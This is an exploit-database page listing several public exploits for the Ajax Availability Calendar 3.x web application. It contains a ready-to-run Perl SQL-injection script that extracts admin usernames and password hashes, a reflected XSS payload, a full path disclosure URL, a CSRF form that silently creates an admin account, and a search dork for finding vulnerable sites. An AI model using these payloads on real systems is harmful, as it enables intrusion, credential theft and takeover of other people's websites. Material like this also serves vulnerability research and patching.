Ajax Availability Calendar 3.X.X - Multiple Vulnerabilties

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ajax Availability Calendar 3.X.X - Multiple Vulnerabilties
# Published : 2013-05-13
# Author :
# Previous Title : Joomla DJ Classifieds Extension 2.0 - Blind SQL Injection Vulnerability
# Next Title : MoinMoin - Arbitrary Command Execution

Ajax Availability Calendar 3.X.X Multiple Vulnerabilties
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.ajaxavailabilitycalendar.com/
.:. Dork           : intitle:"Ajax Availability Calendar"   ,   inurl:"/ac-admin/index.php"
####################################################################
===[ Exploit ]===

Sql Injection:
==============
#!/usr/bin/perl -w

# Ajax Availability Calendar 3.X.X Remote SQL Injection Vulnerability
# Author      : AtT4CKxT3rR0r1ST  
# Contact     : F.Hack@w.cn
# Script      : http://www.ajaxavailabilitycalendar.com/
# Admin Panel : www.site.com/ac-admin/ 
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|----------------------------------------------------|n";
print "|          'Ajax Availability Calendar 3.X.X'        |n";
print "| Coded by   : AtT4CKxT3rR0r1ST                      |n";
print "|----------------------------------------------------|n";
use LWP::UserAgent;
print "nInsert Target:";
chomp(my $target=<STDIN>);
print "n[!] Exploiting Progress...n";
print "n";
#Nama Column
$Column="group_concat(username,0x3a,password)";
#Nama Table
$table="bookings_admin_users";
$b = LWP::UserAgent->new() or die "Could not initialize browsern";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "?id_item=null and 1=2 union select ".$Column."+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/:(.*):([0-9a-fA-F]{32})/){
print "n[+] Admin User : $1n";
}if($answer =~/([0-9a-fA-F]{32})/){
print "n[+] Admin Hash : $1n";
print "[+] Success !!n";

}



else{print "[-] Unable To Get The Information...n";
}


Reflected XSS:
==============

www.site.com/?id_item='"--></style></script><script>alert(0x000581)</script>


Full Path Disclosure:
====================

www.site.com/ac-includes/common.inc.php


CSRF:
=====
[Add Admin]
-------------

<form method="POST" name="form0" action="http://www.site.com/ac-admin/index.php?page=admin_users&action=new">
<input type="hidden" name="add[username]" value="admin"/>
<input type="hidden" name="password" value="Palestine"/>
<input type="hidden" name="password2" value="Palestine"/>
</form>

</body>
</html>
####################################################################